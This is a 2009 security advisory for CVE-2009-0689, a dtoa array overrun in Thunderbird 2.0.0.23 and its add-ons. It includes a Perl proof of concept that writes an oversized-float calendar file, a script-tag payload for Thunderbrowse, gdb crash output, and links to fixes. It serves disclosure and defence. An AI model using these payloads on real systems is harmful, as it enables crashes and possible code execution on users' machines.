Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code execution)

2009.12.14
Credit: Maksymilian Arciemowicz
Risk: High
Local: Yes
Remote: Yes
CVE: CVE-2009-0689
CWE: CWE-119


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[ Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code execution) ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com Date: - Dis.: 07.05.2009 - Pub.: 11.12.2009 CVE: CVE-2009-0689 CWE: CWE-119 Risk: High Remote: Yes Affected Software: - Thunderbird 2.0.0.23 Fixed in: - Thunderbird 3.0 - Thunderbird 2.0.0.24pre NOTE: Prior versions may also be affected. Original URL: http://securityreason.com/achievement_securityalert/78 --- 0.Description --- Thunderbird 2 includes many new features to help you manage your inbox. With Thunderbird 2, it?s easier to prioritize and find your important email with tags and the new find bar helps you find content within your email faster. Lightning brings the Sunbird calendar to the popular email client, Mozilla Thunderbird. Since it's an extension, Lightning is tightly integrated with Thunderbird, allowing it to easily perform email-related calendaring tasks. --- 1. Thunderbird 2.0.0.23 (lib) Remote Array Overrun (Arbitrary code execution) --- The main problem exist in dtoa implementation. Thunderbird has the same dtoa as Firefox, etc. This problem affects many additional Add-ons for thunderbird. Example for affected Add-ons: - Lightning 0.9 - Thunderbrowse 3.2.6.7 - more and it is the same like SREASONRES:20090625. http://securityreason.com/achievement_securityalert/63 but fix for SREASONRES:20090625, used by openbsd was not good. More information about fix for openbsd and similars SREASONRES:20091030, http://securityreason.com/achievement_securityalert/69 We can create any number of float, which will overwrite the memory. In Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it is possible to call 16<= elements of freelist array. --- 2. Proof of Concept (PoC) --- (PoC for Lightning ) ----------------------- #!/usr/bin/perl # SecurityReason.com # sp3x # tested on WinXp SP3 my $header = "BEGIN:VCALENDAR\n". "PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.1//EN\n". "VERSION:2.0\n". "BEGIN:VTIMEZONE\n". "TZID:Europe/Prague\n". "X-LIC-LOCATION:Europe/Prague\n". "BEGIN:DAYLIGHT\n". "TZOFFSETFROM:+0100\n". "TZOFFSETTO:+0200\n". "TZNAME:CEST\n". "DTSTART:19700329T020000\n". "RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=3\n". "END:DAYLIGHT\n". "BEGIN:STANDARD\n". "TZOFFSETFROM:+0200\n". "TZOFFSETTO:+0100\n". "TZNAME:CET\n". "DTSTART:19701025T030000\n". "RRULE:FREQ=YEARLY;INTERVAL=1;BYDAY=-1SU;BYMONTH=10\n". "END:STANDARD\n". "END:VTIMEZONE\n". "BEGIN:VEVENT\n". "CREATED:20091117T095214Z\n". "LAST-MODIFIED:20091117T095217Z\n". "DTSTAMP:20091117T095214Z\n". "UID:5d0cfefe-22f6-476e-93bf-bd13df140b18\n"; my $s = "SUMMARY:0."; my $expl = "1" x 296450; my $footer = "\nDTSTART;TZID=Europe/Prague:20100111T110000\n". "DTEND;TZID=Europe/Prague:20100111T120000\n". "END:VEVENT\n". "END:VCALENDAR\n"; open(myfile,'>>test.ics'); print myfile $header.$s.$expl.$footer; ----------------------- (PoC for Thunderbrowse ) ----------------------- <script> var a=0.<?php echo str_repeat("1",333333); ?>; </script> ----------------------- When we use Thunderbrowse to see this site, Thunderbird will crash with: Program terminated with signal 11, Segmentation fault. #0 0xbb15d1e7 in ?? () eax 0x0 0 ecx 0xa 10 edx 0x0 0 ebx 0xbb16eb38 -1156125896 esp 0xbfbfce58 0xbfbfce58 ebp 0xbfbfce74 0xbfbfce74 esi 0xb 11 edi 0xb768e700 -1217861888 eip 0xbb15d1e7 0xbb15d1e7 eflags 0x282 [ SF IF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0xab 171 gs 0xb3 179 (gdb) x/x ($eip) 0xbb15d1e7: Cannot access memory at address 0xbb15d1e7 (gdb) x/x ($esi) 0xb: Cannot access memory at address 0xb (gdb) x/x ($edi) 0xb768e700: 0x1c71c71c now esi=0xb and edi=0x1c71c71c (gdb) x/20x ($edi) 0xb768e700: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c 0xb768e710: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 0xb768e720: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71 0xb768e730: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c 0xb768e740: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 (gdb) x/50x ($edi)+37000 0xb7697788: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 0xb7697798: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71 0xb76977a8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c 0xb76977b8: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7 0xb76977c8: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71 0xb76977d8: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c 0xb76977e8: 0xc71c71c7 0x91c71c71 0x0b76d741 0x1af63420 0xb76977f8: 0x7c6568c4 0xd74952a1 0x552d1c87 0x4018081a 0xb7697808: 0xcb313ca6 0xd16c5484 0x36d13467 0x130c4b7d 0xb7697818: 0x92c1d06c 0xf70d9591 0x56bea87c 0x7c7bcc44 0xb7697828: 0xe6dd415d 0x210c53a8 0x482d162b 0x6d39c1c9 0xb7697838: 0x478f5fb2 0x9d6a2f46 0xe8b20d52 0xb012aa49 0xb7697848: 0xd75822f6 0x83ebbe5a --- 3. SecurityReason Note --- Officialy SREASONRES:20090625 has been detected in: - OpenBSD - NetBSD - FreeBSD - MacOSX - Google Chrome - Mozilla Firefox - Mozilla Seamonkey - Mozilla Thunderbird - Mozilla Sunbird - Mozilla Camino - KDE (example: konqueror) - Opera - K-Meleon - F-Lock This list is not yet closed. --- 4. Fix --- NetBSD fix (optimal): http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h OpenBSD fix: http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c --- 5. Credits --- Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com. --- 6. Greets --- Infospec p_e_a pi3 --- 7. Contact --- Email: - cxib {a.t] securityreason [d0t} com - sp3x {a.t] securityreason [d0t} com GPG: - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg - http://securityreason.com/key/sp3x.gpg http://securityreason.com/ http://securityreason.pl/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top